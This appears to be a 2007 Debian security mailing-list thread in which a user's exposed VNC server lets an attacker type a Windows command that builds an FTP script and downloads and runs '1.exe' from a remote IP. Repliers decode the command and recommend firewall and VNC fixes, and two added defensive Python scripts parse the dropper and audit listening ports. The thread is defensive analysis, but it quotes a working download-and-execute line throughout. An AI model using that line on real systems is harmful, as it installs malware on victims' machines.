spooky windows script


spooky windows script

Jan Outhuis
Hello,

Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:

%systemroot%\system32\cmd.exe
cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

(I see on my network monitor that this is coming from outside; IP-number and user name vary.)

After that all is back to normal.

Now this is of course a nuisance, but is it also a threat? And what can be done against it?

Anybody got a clue on this?

Tia,

Jan Outhuis



--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]


Re: spooky windows script

Henri Salo-2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[hidden email]> wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while
> surfing the net. My cursor is taken over and the following code is
> typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >>
> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik
> &1.exe &exit
>
> (I see on my network monitor that this is coming from outside;
> IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a threat? And what
> can be done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis
>

Do you have any kind of VNC-servers running? What is your IP address?
Can I scan your open ports from it?

- ---
Henri Salo <fgeek at fgeek.fi> +358407705733
GPG ID: 2EA46E4F  fp: 14D0 7803 BFF6 EFA0 9998  8C4B 5DFE A106 2EA4 6E4F
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGQHm1Xf6hBi6kbk8RAvTbAJ0es46vFTz+/6upbt8K3lYYV8HhfwCgs5CC
LK0OvGWT07LV7sZuH+RItUE=
=J58p
-----END PGP SIGNATURE-----

Re: spooky windows script

Dale Amon
In reply to this post by Jan Outhuis
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

If you were running a windows system this might
do something really nasty since it creates a download
script and executes it. Perhaps to pull in a root kit?
I haven't done DOS in a long time so I am a bit shaky
in fully interpreting.

Check for something named 1.exe in your directory.



Re: spooky windows script

celejar
In reply to this post by Jan Outhuis
On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[hidden email]> wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a threat? And what can be done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator



Re: spooky windows script

andersen-4

If this occurred on my Windows box, I would back up what needs to be backed up
and reload the OS with something useful.  Your machine has clearly been
compromised.



--

On Tue, 8 May 2007, Celejar wrote:

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[hidden email]> wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a threat? And what can be done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator





Re: spooky windows script

Stephan Loh
In reply to this post by celejar
hi,

> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

to clarify what this command line does:

it writes the following text lines in a file called "ik":

open 59.31.153.120 22783
user db database
get 1.exe
bye

these are FTP commands, which are now being executed by the windows FTP
client. the parameters -n -v suppress user auto-login and verbose output,
and the parameter -s:ik executes the content of the file "ik" as FTP
commands. the file ftp://db:database@59.31.153.120:22783/1.exe is being
fetched, the file "ik" is then being deleted and finally the file
"1.exe" is being executed. i suppose that 1.exe is some kind of windows
trojan or virus.

cheers,
-stephan loh
 

On 2007.05.08 15:39, Celejar wrote:

> On Tue,  8 May 2007 14:57:24 +0200 (CEST)
> Jan Outhuis <[hidden email]> wrote:
>
> > Hello,
> >
> > Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> >
> > %systemroot%\system32\cmd.exe
> > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> >
> > (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> >
> > After that all is back to normal.
> >
> > Now this is of course a nuisance, but is it also a threat? And what can be done against it?
> >
> > Anybody got a clue on this?
> >
> > Tia,
> >
> > Jan Outhuis
>
> Are you running linux or windows? With what program are you surfing?
> Where is that text displayed? The cmd.exe line looks like someone
> trying to open the windows command shell; the next line looks like
> someone trying to capture some data from your system and ftp it
> outwards. I'm just guessing, but it does appear to be a threat.
>
> Celejar
> --
> mailmin.sourceforge.net - remote access via secure (OpenPGP) email
> ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
>
>
>
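Stephan's reading of the command line can be mechanised. The Python below is an added example written for this page, not code from the thread or from any poster: it parses the captured one-liner into the FTP script it builds and returns the remote endpoint, credentials and filenames as indicators a defender can block at the firewall and look for on disk (the check Dale suggests for 1.exe, plus the script file "ik"). It assumes `&` is the only command separator and that nothing is quoted, which holds for the line Jan reported.

```python
"""Turn the captured cmd.exe one-liner into indicators a defender can act on.

Added example, not code from the thread. It parses the `echo ... >> file`
chain, the `ftp -s:file` call, the `del` of the script and whatever is run
afterwards, and reports host, port, credentials and the fetched filename.
Assumption: `&` is the only separator and nothing is quoted.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# The two lines reported in the thread, joined as one captured string.
CAPTURED = (
    r"%systemroot%\system32\cmd.exe" "\n"
    "cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik "
    "&echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit"
)


@dataclass
class FtpDropper:
    script_file: Optional[str] = None
    host: Optional[str] = None
    port: int = 21                      # ftp.exe default when `open` gives no port
    user: Optional[str] = None
    password: Optional[str] = None
    fetched: List[str] = field(default_factory=list)
    executed: List[str] = field(default_factory=list)
    deletes_script: bool = False


def parse_ftp_dropper(cmdline: str) -> FtpDropper:
    m = re.search(r"cmd(?:\.exe)?\s+/c\s+(.*)", cmdline, re.IGNORECASE | re.DOTALL)
    body = m.group(1) if m else cmdline
    result = FtpDropper()
    script_lines: Dict[str, List[str]] = {}
    # cmd.exe runs '&'-separated commands left to right
    for part in (p.strip() for p in body.split("&") if p.strip()):
        echo = re.match(r"echo\s+(.*?)\s*>>?\s*(\S+)$", part, re.IGNORECASE)
        if echo:                                  # a line appended to the script file
            script_lines.setdefault(echo.group(2), []).append(echo.group(1))
            continue
        ftp = re.match(r"ftp\b.*?-s:(\S+)", part, re.IGNORECASE)
        if ftp:                                   # ftp.exe fed the script file
            result.script_file = ftp.group(1)
            continue
        dele = re.match(r"del\s+(\S+)", part, re.IGNORECASE)
        if dele and dele.group(1) == result.script_file:
            result.deletes_script = True          # the script is removed after use
            continue
        if part.lower() != "exit":
            result.executed.append(part)          # anything else run after the transfer
    # interpret the ftp commands that were written into the script file
    for cmd in script_lines.get(result.script_file or "", []):
        tokens = cmd.split()
        if not tokens:
            continue
        verb = tokens[0].lower()
        if verb == "open" and len(tokens) >= 2:
            result.host = tokens[1]
            if len(tokens) >= 3 and tokens[2].isdigit():
                result.port = int(tokens[2])
        elif verb == "user" and len(tokens) >= 2:
            result.user = tokens[1]
            result.password = tokens[2] if len(tokens) >= 3 else None
        elif verb in ("get", "mget") and len(tokens) >= 2:
            result.fetched.append(tokens[1])
    return result


def ftp_url(d: FtpDropper) -> Optional[str]:
    """The fetched object as an ftp:// URL, the form Stephan gives above."""
    if not (d.host and d.fetched):
        return None
    auth = f"{d.user}:{d.password}@" if d.user else ""
    return f"ftp://{auth}{d.host}:{d.port}/{d.fetched[0]}"


def indicators(d: FtpDropper) -> Dict[str, object]:
    """What to block (remote endpoint) and what to look for on disk."""
    return {
        "block_endpoint": f"{d.host}:{d.port}",
        "hunt_files": sorted(set(d.fetched + ([d.script_file] if d.script_file else []))),
        "executed": d.executed,
        "script_deleted": d.deletes_script,
    }


if __name__ == "__main__":
    parsed = parse_ftp_dropper(CAPTURED)
    print(ftp_url(parsed))
    print(indicators(parsed))
```

Because the keystrokes were injected into whatever window had focus, the same parser can be run over whatever captured them (a terminal scrollback, a keylogger-style audit trail) to pull out the endpoint for a firewall rule, and the absence of "ik" and "1.exe" on disk is consistent with the commands never having reached a cmd.exe.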



Re: spooky windows script

David Clymer
In reply to this post by Jan Outhuis
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:

> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
>
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a threat? And what can be done against it?
>
> Anybody got a clue on this?
>

I'm sure someone has a clue. However, clued listmembers or not, a
windows security issue is not an appropriate topic for discussion on a
mailing list called "debian-security". As the name implies, this list is
for discussing security issues as they relate to the Debian GNU/Linux
distribution.

-davidc

--
A good hot dog feeds the hand that bites it.



Re: spooky windows script

Jan Outhuis
In reply to this post by Jan Outhuis



Well,

to specify on this, I am running Debian testing, and surfing with Firefox 2.0.

The script gets typed in any window that's active at the moment the cursor is being taken over: it may be the Firefox 'find'-field or a terminal window for that matter.

I've checked my filesystem and no 1.exe file seems to be present.

My IP-address is assigned dynamically by my ISP; it differs every time I log in. But I do have vino-server running. I'm going to check on that.

thanks

> Date: 08/05/07 04:15 PM
> From: "David Clymer" <[hidden email]>
> To: [hidden email]
> CC:
> Subject: Re: spooky windows script
>
> On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
> > Hello,
> >
> > Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> >
> > %systemroot%\system32\cmd.exe
> > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> >
> > (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> >
> > After that all is back to normal.
> >
> > Now this is of course a nuisance, but is it also a threat? And what can be done against it?
> >
> > Anybody got a clue on this?
> >
>
> I'm sure someone has a clue. However, clued listmembers or not, a
> windows security issue is not an appropriate topic for discussion on a
> mailing list called "debian-security". As the name implies, this list is
> for discussing security issues as they relate to the Debian GNU/Linux
> distribution.
>
> -davidc
>
> --
> A good hot dog feeds the hand that bites it.



Re: spooky windows script

Chris Adams-3

On May 8, 2007, at 9:17 AM, Jan Outhuis wrote:
> The script gets typed in any window that's active at the moment the
> cursor is being taken over: it may be the Firefox 'find'-field or a
> terminal window for that matter.

Do you have a VNC server installed? If so you really want to either
remove it or configure it to only listen on localhost so you can
access it over an SSH tunnel but remote attackers can't get in. I'd
also strongly recommend that you configure the built-in firewall
since you may have other exposed services - unfortunately I don't
have a package recommendation as I just configure iptables directly.

I've seen this happen a couple of times on Macs where people
inadvertently left VNC open w/o a password with very similar
behaviour, which suggests people are scanning for vulnerable VNC
installs but the automated stuff currently only has Windows exploits.

Chris



Re: spooky windows script

celejar
In reply to this post by Jan Outhuis
On Tue,  8 May 2007 18:17:08 +0200 (CEST)
Jan Outhuis <[hidden email]> wrote:

>
>
>
> > Well,
> >
> > to specify on this, I am running Debian testing, and surfing with Firefox 2.0.
> >
> > The script gets typed in any window that's active at the moment the cursor is being taken over: it may be the Firefox 'find'-field or a terminal window for that matter.
> >
> > I've checked my filesystem and no 1.exe file seems to be present.
> >
> > My IP-address is assigned dynamically by my ISP; it differs every time I log in. But I do have vino-server running. I'm going to check on that.
> >
> > thanks

Just for the record, I apparently interpreted the ftp business backward
in my earlier post; pulling in, not sending out.

Celejar
--
mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator



Re: spooky windows script

Thomas Hochstein
In reply to this post by Jan Outhuis
Chris Adams wrote:

> Do you have a VNC server installed?

| But I do have vino-server running.

Yes.



Re: spooky windows script

Gerardo Curiel-2
On Tue, 08-05-2007 at 22:24 +0200, Thomas Hochstein wrote:
> Chris Adams wrote:
>
> > Do you have a VNC server installed?
>
> | But I do have vino-server running.
>
> Yes.

That's the problem, the same happened to me a couple of weeks ago, on my
desktop (a newly installed Debian Unstable).

Vino seems to open the vnc port to the outside without password when
installed by default.


>
>

--
Gerardo Curiel  <[hidden email]>  <[hidden email]>
Geek By NaTure,LiNuX By ChOiCe,DebiAn of CoUrsE
gpg fingerprint: 228B 0F96 8653 DF52 9740  B75E FB32 9C30 E179 7BD2
http://www.debian.org


Re: spooky windows script

Noah Meyerhans-3
On Tue, May 08, 2007 at 05:34:30PM -0400, Gerardo Curiel wrote:

> On Tue, 08-05-2007 at 22:24 +0200, Thomas Hochstein wrote:
> > Chris Adams wrote:
> >
> > > Do you have a VNC server installed?
> >
> > | But I do have vino-server running.
>
> That's the problem, the same happened to me a couple of weeks ago, in my
> Desktop(a newly installed Debian Unstable).
>
> Vino seems to open the vnc port to the outside without password when
> installed by default.
No, vino doesn't do anything by default (just confirmed in sid).  What
do you have configured in System -> Preferences -> Remote Desktop ?  By
default, nobody can connect at all.  Clicking on the only initially
active checkbox ("Allow other users to view your desktop") results in a
configuration where other users can connect, but they can't actually
view or control your desktop until you've approved their connection via
a popup dialog.  If you uncheck "Ask you for confirmation" and neglect
to check "Require the user to enter this password" and provide a
password, then it seems that unauthenticated, unapproved connections are
allowed.  IMO this should never ever be allowed, but it is.  It's
definitely not the default state, though.

noah



Re: spooky windows script

Lee Braiden-4
In reply to this post by Gerardo Curiel-2
On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote:

> On Tue, 08-05-2007 at 22:24 +0200, Thomas Hochstein wrote:
> > Chris Adams wrote:
> > > Do you have a VNC server installed?
> > >
> > | But I do have vino-server running.
> >
> > Yes.
>
> That's the problem, the same happened to me a couple of weeks ago, in my
> Desktop(a newly installed Debian Unstable).
>
> Vino seems to open the vnc port to the outside without password when
> installed by default.

I would say the problem is more that his system is configured to allow any
servers without explicit authorisation.  That could just as easily have been
a trojan or rootkit opening a port.  Best to set up your firewall to block all
incoming connections by default, and explicitly allow only what your system
is actually serving, and only to machines it needs to serve.

--
Lee
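Chris's advice to have VNC listen only on localhost and Lee's default-deny rule can both be checked from the host itself. The Python below is an added example for this page, not code from the thread: it parses `ss -ltn` style output (a constructed sample is embedded so it runs offline; on a live machine feed it the real command output) and flags every listener bound to a non-loopback address whose port is not on an explicit allow-list. With an allow-list of just SSH, the sample's VNC listeners on 0.0.0.0 and :: are reported as exposed, which is the state a vino-server accepting unapproved connections would be in.

```python
"""Audit listening TCP sockets for services reachable from other hosts.

Added example, not code from the thread. Input is `ss -ltn` (or
`netstat -ltn`) output; the sample below is constructed. A listener is
flagged when it is bound to a non-loopback address and its port is not on
the allow-list, which is Lee's posture: deny incoming by default, allow only
what the box is meant to serve.
"""
import ipaddress
from typing import Dict, List, Set, Tuple

# Constructed sample in `ss -ltn` layout: VNC (5900) bound to all interfaces
# on both IPv4 and IPv6, CUPS on loopback only, SSH on all interfaces.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*
LISTEN  0       5       0.0.0.0:5900         0.0.0.0:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       5       [::]:5900            [::]:*
LISTEN  0       128     [::1]:631            [::]:*
"""

# Port-to-name hints for the report only; unknown ports are still flagged.
WELL_KNOWN = {22: "ssh", 631: "cups", 5900: "vnc"}


def parse_listeners(ss_output: str) -> List[Tuple[str, int]]:
    """Return (address, port) pairs for every LISTEN row."""
    listeners = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header or unrelated row
        addr, port = fields[3].rsplit(":", 1)   # split on the last ':' so IPv6 survives
        listeners.append((addr.strip("[]"), int(port)))
    return listeners


def is_local_only(addr: str) -> bool:
    """True when the bind address cannot be reached from another host."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False  # unexpected token: treat as exposed rather than safe


def exposed_listeners(ss_output: str, allowed_ports: Set[int]) -> List[Dict[str, object]]:
    """Listeners other machines can reach that are not explicitly allowed."""
    findings = []
    for addr, port in parse_listeners(ss_output):
        if is_local_only(addr) or port in allowed_ports:
            continue
        findings.append({"address": addr, "port": port,
                         "service": WELL_KNOWN.get(port, "unknown")})
    return findings


if __name__ == "__main__":
    for f in exposed_listeners(SAMPLE_SS_OUTPUT, allowed_ports={22}):
        print(f"exposed: {f['service']} on {f['address']}:{f['port']}")
```

The allow-list is the list of services the machine is meant to offer; anything the audit reports that is not on it is either a service to bind to 127.0.0.1 (and reach over an SSH tunnel, as Chris suggests) or a listener that should not exist at all.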


Re: spooky windows script

Jan Outhuis
In reply to this post by Jan Outhuis

That's just what I've done: closed the vnc-holes in my firewall (btw it does use a blacklist on incoming connections), and configured the vino-server to not be running by default and when it runs to not accept any unauthorised connections.

Let's see if that does the trick.

Greetings,

Jan

> Date: 09/05/07 08:11 AM
> From: "Lee Braiden" <[hidden email]>
> To: [hidden email]
> CC:
> Subject: Re: spooky windows script
>
> On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote:
> > On Tue, 08-05-2007 at 22:24 +0200, Thomas Hochstein wrote:
> > > Chris Adams wrote:
> > > > Do you have a VNC server installed?
> > > >
> > > | But I do have vino-server running.
> > >
> > > Yes.
> >
> > That's the problem, the same happened to me a couple of weeks ago, in my
> > Desktop(a newly installed Debian Unstable).
> >
> > Vino seems to open the vnc port to the outside without password when
> > installed by default.
>
> I would say the problem is more that his system is configured to allow any
> servers without explicit authorisation.  That could just as easily have been
> a trojan or rootkit opening a port.  Best to setup your firewall to block all
> incoming connections by default, and explicitly allow only what your system
> is actually serving, and only to machines it needs to serve.
>
> --
> Lee
>
>
>